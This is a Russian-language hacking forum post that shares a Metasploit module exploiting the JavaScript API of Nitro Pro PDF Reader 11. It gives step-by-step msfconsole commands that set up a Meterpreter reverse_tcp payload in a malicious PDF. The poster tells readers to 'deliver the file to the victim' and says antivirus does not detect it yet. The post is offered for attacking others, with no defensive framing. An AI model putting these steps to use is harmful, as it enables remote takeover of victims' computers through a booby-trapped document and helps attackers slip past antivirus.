Доброго дня форумчане!
Лазал я тут намедни по свеженьким эксплоитам и наткнулся на в полне не плохую на мой взгляд эксплуатацию
Ссылка скрыта от гостей
Характеристики кода: Этот модуль использует небезопасный Javascript API , реализованный в Нитро Nitro Pro PDF Reader версии 11. SAVEAS () функция JavaScript API позволяет писать произвольные файлы в файл система. Кроме того, функция launchURL () позволяет злоумышленнику выполнять локальные файлы в файловой системе и в обход диалогового окна системы безопасности Примечание: Это 100% надежный (кривой переводчик))))
1. И так у кого нет в репазитории msf данного модуля скачиваем его
Ссылка скрыта от гостей
2. Скаченный експлойт переименновываем в (nitro_pdf_jsapi.rb) и копируем по пути :
/usr/share/metasploit-framework/modules/exploits/windows/fileformat
3.Далее : msfconsole
use exploit/windows/fileformat/nitro_pdf_jsapi
set lhost (ваш ip)
set lport 4444
set payload windows/meterpreter/reverse_tcp
set FILENAME (имя исходной полезной нагрузки).pdf
exploit
Файлик доставляем естественно жертве ) Минус данного модуля на мой взгляд что он работает на платформах где вместо Acrobat Reader установлена именно Nitro pdf editor не знаю на сколько он известен и у многих ли он установлен по умолчанию ..я лично с ним столкнулся при эксплуатации)
К великому сожалению собственное видео оформить не удалось т.к нужен апгрей железа(
PS: антивирусами пока что не палится)
PS: антивирусами пока что не палится)